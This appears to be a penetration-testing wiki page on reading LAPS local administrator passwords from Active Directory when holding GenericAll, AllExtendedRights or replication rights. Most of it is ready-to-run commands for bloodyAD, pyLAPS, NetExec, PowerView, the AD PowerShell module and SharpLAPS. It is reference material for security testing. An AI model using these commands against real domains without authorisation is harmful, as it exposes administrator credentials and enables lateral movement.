ReadLAPSPassword

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).

Alternative #1: Using bloodyAD

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Alternative #2: pyLAPS (Python)

pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101

Alternative #3: NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.

# Default command
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps

# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"

Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.

Alternative #4: LAPSDumper is another Python alternative.

Alternative #1: TheActive Directory PowerShell module.

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

Alternative #2: The PowerView powershell module from PowerSploit.

Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

Alternative #3: SharpLAPS (C#) automates the process.

SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

Last updated 1 year ago